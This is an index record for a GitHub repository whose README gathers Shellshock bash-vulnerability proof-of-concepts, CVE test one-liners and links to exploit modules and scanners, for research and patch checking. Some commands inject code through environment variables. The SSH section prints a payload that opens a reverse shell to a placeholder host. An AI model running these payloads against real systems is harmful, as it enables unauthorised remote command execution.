{"id":13516753,"url":"https://github.com/mubix/shellshocker-pocs","last_synced_at":"2025-04-12T20:42:01.434Z","repository":{"id":21212760,"uuid":"24525672","full_name":"mubix/shellshocker-pocs","owner":"mubix","description":"Collection of Proof of Concepts and Potential Targets for #ShellShocker","archived":false,"fork":false,"pushed_at":"2020-05-16T12:26:23.000Z","size":57,"stargazers_count":888,"open_issues_count":2,"forks_count":190,"subscribers_count":113,"default_branch":"master","last_synced_at":"2025-04-04T00:07:43.468Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/mubix.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2014-09-27T06:57:22.000Z","updated_at":"2025-02-12T13:58:37.000Z","dependencies_parsed_at":"2022-07-27T02:02:02.208Z","dependency_job_id":null,"html_url":"https://github.com/mubix/shellshocker-pocs","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mubix%2Fshellshocker-pocs","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mubix%2Fshellshocker-pocs/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mubix%2Fshellshocker-pocs/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mubix%2Fshellshocker-pocs/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mubix","download_url":"https://codeload.github.com/mubix/shellshocker-pocs/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"htt
ps://github.com","kind":"github","repositories_count":248631668,"owners_count":21136554,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-01T05:01:25.506Z","updated_at":"2025-04-12T20:42:01.414Z","avatar_url":"https://github.com/mubix.png","language":"Python","funding_links":[],"categories":["Python","Technical","\u003ca id=\"8c5a692b5d26527ef346687e047c5c21\"\u003e\u003c/a\u003e收集"],"sub_categories":["ramanihiteshc@gmail.com"],"readme":"Shellshocker - Repository of \"Shellshock\" Proof of Concept Code\n=================\n\nCollection of Proof of Concepts and Potential Targets for #ShellShocker\n\nWikipedia Link: https://en.wikipedia.org/wiki/Shellshock_%28software_bug%29#CVE-2014-7186_and_CVE-2014-7187_Details\n\nPlease submit a pull request if you have more links or other resources\n\n**Speculation: (unconfirmed, possibly vulnerable)** \n\n+ XMPP(ejabberd)\n+ ~~Mailman~~ - [confirmed not vulnerable](http://www.mail-archive.com/mailman-users%40python.org/msg65380.html)\n+ MySQL\n+ NFS\n+ Bind9\n+ Procmail [see](https://www.dfranke.us/posts/2014-09-27-shell-shock-exploitation-vectors.html)\n+ Exim [see](https://www.dfranke.us/posts/2014-09-27-shell-shock-exploitation-vectors.html)\n+ Juniper Google Search `inurl:inurl:/dana-na/auth/url_default/welcome.cgi`\n  + via: https://twitter.com/notsosecure/status/516132301025984512\n  + via: http://kb.juniper.net/InfoCenter/index?page=content\u0026id=JSA10648\u0026actp=RSS\n+ Cisco Gear\n  + via: http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash\n+ FreePBX / Asterisk 
[patched here](http://community.freepbx.org/t/cve-2014-6271-shellshock-bash-exploit/24431)\n\n**If you know of PoCs for any of these, please submit an issue or pull request with a link.**\n\n## Command Line (Linux, OSX, and Windows via Cygwin)\n\n+ [bashcheck](https://github.com/hannob/bashcheck) - script to test for the latest vulns\n\n### CVE-2014-6271\n+ `env X='() { :; }; echo \"CVE-2014-6271 vulnerable\"' bash -c id`\n\n### CVE-2014-7169\n_will create a file named echo in cwd with date in it, if vulnerable_\n+ `env X='() { (a)=\u003e\\' bash -c \"echo date\"; cat echo`\n\n### CVE-2014-7186\n+ `bash -c 'true \u003c\u003cEOF \u003c\u003cEOF \u003c\u003cEOF \u003c\u003cEOF \u003c\u003cEOF \u003c\u003cEOF \u003c\u003cEOF \u003c\u003cEOF \u003c\u003cEOF \u003c\u003cEOF \u003c\u003cEOF \u003c\u003cEOF \u003c\u003cEOF \u003c\u003cEOF' || echo \"CVE-2014-7186 vulnerable, redir_stack\"`\n\n### CVE-2014-7187\n+ `(for x in {1..200} ; do echo \"for x$x in ; do :\"; done; for x in {1..200} ; do echo done ; done) | bash || echo \"CVE-2014-7187 vulnerable, word_lineno\"`\n\n### CVE-2014-6278\n+ `env X='() { _; } \u003e_[$($())] { echo CVE-2014-6278 vulnerable; id; }' bash -c :`\n+ Additional information: http://lcamtuf.blogspot.com/2014/10/bash-bug-how-we-finally-cracked.html\n\n### CVE-2014-6277\n_will segfault if vulnerable_\n+ `env X='() { x() { _; }; x() { _; } \u003c\u003ca; }' bash -c :`\n+ Additional discussion on fulldisclosure: http://seclists.org/fulldisclosure/2014/Oct/9\n+ Additional information: http://lcamtuf.blogspot.com/2014/10/bash-bug-how-we-finally-cracked.html\n\n\n\n## IBM z/OS - \n+ http://mainframed767.tumblr.com/post/98446455927/bad-news-is-it-totally-works-in-bash-on-z-os-and\n\n## HTTP\n+ Metasploit Exploit Module - [Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/apache_mod_cgi_bash_env_exec.rb)\n+ Metasploit Exploit Module - [Advantech 
Switch Bash Environment Variable Code Injection (Shellshock)](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/advantech_switch_bash_env_exec.rb)\n+ Metasploit Exploit Module - [IPFire Bash Environment Variable Injection (Shellshock)](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/ipfire_bashbug_exec.rb)\n+ HTTP Header Pollution by @irsdl - http://pastebin.com/QNkf7dYS\n+ HTTP CGI-BIN - http://pastebin.com/166f8Rjx\n+ cPanel - http://blog.sucuri.net/2014/09/bash-vulnerability-shell-shock-thousands-of-cpanel-sites-are-high-risk.html\n+ Digital Alert Systems DASDEC - http://seclists.org/fulldisclosure/2014/Sep/107\n+ F5 - https://twitter.com/securifybv/status/515035044294172673\n  + https://twitter.com/securifybv/status/515035044294172673/photo/1\n  + https://twitter.com/avalidnerd/status/515056463589675008\n    + https://twitter.com/avalidnerd/status/515056463589675008/photo/1\n+ Invisiblethreat.ca - https://www.invisiblethreat.ca/2014/09/cve-2014-6271/\n+ Commandline version - https://gist.github.com/mfadzilr/70892f43597e7863a8dc\n+ User-Agent based walkthrough with LiveHTTPHeaders - http://www.lykostech.net/lab-time-exploiting-shellshock-bash-bug-virtual-server/\n+ User-Agent based walkthrough with Burp - http://oleaass.com/shellshock-proof-of-concept-reverse-shell/\n+ User-Agent based but supports Tor and Socks5 (Python) - https://github.com/lnxg33k/misc/blob/master/shellshock.py\n+ User-Agent based in Ruby - https://github.com/securusglobal/BadBash\n+ Header based simple scanner using sleep with multithread support - https://github.com/gry/shellshock-scanner\n+ [shocker](https://github.com/nccgroup/shocker) - Checks across a list of URLs in a file, or a single URL, against a list of known vulnerable CGI resources (Content-type Method)\n+ Xymon - https://lists.xymon.com/archive/2014-September/040350.html\n+ QNAP - https://www.exploit-db.com/exploits/36503\n\n## Phusion Passenger\n+ 
https://news.ycombinator.com/item?id=8369776 \n\n## DHCP\n+ TrustedSec exploitation via Tftpd32 - https://www.trustedsec.com/september-2014/shellshock-dhcp-rce-proof-concept/\n+ Metasploit Exploit Module - [Dhclient Bash Environment Variable Injection (Shellshock)](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/dhcp/bash_environment.rb)\n+ Metasploit Auxiliary Module - https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/server/dhclient_bash_env.rb\n+ Perl Script - http://pastebin.com/S1WVzTv9\n+ Using a Wi-Fi pineapple to force people to join the network - http://d.uijn.nl/?p=32\n\n## SSH\n+ Stack Overflow - http://unix.stackexchange.com/questions/157477/how-can-shellshock-be-exploited-over-ssh\n+ SSH ForcedCommand - https://twitter.com/JZdziarski/status/515205581226123264\n  + https://twitter.com/JZdziarski/status/515205581226123264/photo/1\n+ SendEnv: `LC_X='() { :; }; echo vulnerable' ssh foo@bar.org -o SendEnv=LC_X`\n+ Gitolite - https://twitter.com/Grifo/status/515089986161766400\n  + $ `ssh GITOLITEUSER@VULNERABLEIP '() { ignore;}; /bin/bash -i \u003e\u0026 /dev/tcp/REVERSESHELLIP/PORT 0\u003e\u00261'`\n  + (necessary to have a git account on the server)\n\n## OSX \n+ Priv Escalation via VMware Fusion - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/osx/local/vmware_bash_function_root.rb\n+ Fix: http://support.apple.com/kb/DL1769\n\n## OSX - with reverse DNS (CVE-2014-3671.txt)\n+ Example zone file: [in-addr.arpa](osx-rev-ptr/in-addr.arpa.zone) that contains a CVE-2014-6271 example.\n+ Example file with a getnameinfo() that passes on to setenv(): [osx-rev-ptr.c](osx-rev-ptr/osx-rev-ptr.c)\n + Advisory with description of above [CVE-2014-3671.txt ](osx-rev-ptr/CVE-2014-3671.txt)\n\n## SIP\n+ SIP Proxies: https://github.com/zaf/sipshock\n\n\n## Qmail\n+ Detailed walkthrough - http://marc.info/?l=qmail\u0026m=141183309314366\u0026w=2\n+ Tweet from @ymzkei5 - 
http://twitter.com/ymzkei5/status/515328039765307392\n  + http://twitpic.com/ec3615\n  + http://twitpic.com/ec361o\n\n## Postfix\n+ http://packetstormsecurity.com/files/128572/postfixsmtp-shellshock.txt\n\n## FTP\n+ Pure-FTPd: https://gist.github.com/jedisct1/88c62ee34e6fa92c31dc\n+ Metasploit Exploit Module - [Pure-FTPd External Authentication Bash Environment Variable Code Injection (Shellshock)](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/ftp/pureftpd_bash_env_exec.rb)\n\n## OpenVPN\n+ OpenVPN - https://news.ycombinator.com/item?id=8385332\n+ PoC Walkthrough by @fj33r - http://sprunge.us/BGjP\n\n## Oracle\n+ [Alert and list of affected Products](http://www.oracle.com/technetwork/topics/security/alert-cve-2014-7169-2303276.html)\n\n## TMNT\n+ https://twitter.com/SynAckPwn/status/514961810320293888/photo/1\n\n## Hand\n+ Via @DJManilaIce - http://pastie.org/9601055\n```\nuser@localhost:~$ env X='() { (a)=\u003e\\' /bin/bash -c \"shellshocker echo -e \\\"           __ __\\n          /  V  \\ \\n     _    |  |   |\\n    / \\   |  |   |\\n    |  |  |  |   |\\n    |  |  |  |   |\\n    |  |__|  |   |\\n    |  |  \\  |___|___\\n    |  \\   |/        \\ \\n    |   |  |______    |\\n    |   |  |          |\\n    |   \\__'   /     |\\n    \\        \\(     /\\n     \\             /\\n      \\|            |\\n\\\"\"; cat shellshocker\n/bin/bash: X: line 1: syntax error near unexpected token `='\n/bin/bash: X: line 1: `'\n/bin/bash: error importing function definition for `X'\n           __ __\n          /  V  \\ \n     _    |  |   |\n    / \\   |  |   |\n    |  |  |  |   |\n    |  |  |  |   |\n    |  |__|  |   |\n    |  |  \\  |___|___\n    |  \\   |/        \\ \n    |   |  |______    |\n    |   |  |          |\n    |   \\__'   /     |\n    \\        \\(     /\n     \\             /\n      \\|            |\n\n```\n\n## CUPS\n+ Metasploit Exploit Module - [CUPS Filter Bash Environment Variable Code 
Injection](https://github.com/rapid7/metasploit-framework/pull/4050)\n\n## IRC\n+ Metasploit Exploit Module - [Xdh / LinuxNet Perlbot / fBot IRC Bot Remote Code Execution](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/misc/xdh_x_exec.rb)\n+ Metasploit Exploit Module - [Legend Perl IRC Bot Remote Code Execution](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/misc/legend_bot_exec.rb)\n\n## Scripts from @primalsec\n+ `shell_shocker.py` - Good for interacting with a known vulnerable URL to pass commands (User-Agent Method)\n+ `w3af_shocker.py` - Automates the process of running a w3af spider/shell\\_shock scan (User-Agent Method)\n+ `shell_sprayer.py` - Checks across a list of URLs in a file, or a single URL against a known list of cgi-bin resources (User-Agent Method)\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmubix%2Fshellshocker-pocs","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fmubix%2Fshellshocker-pocs","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmubix%2Fshellshocker-pocs/lists"}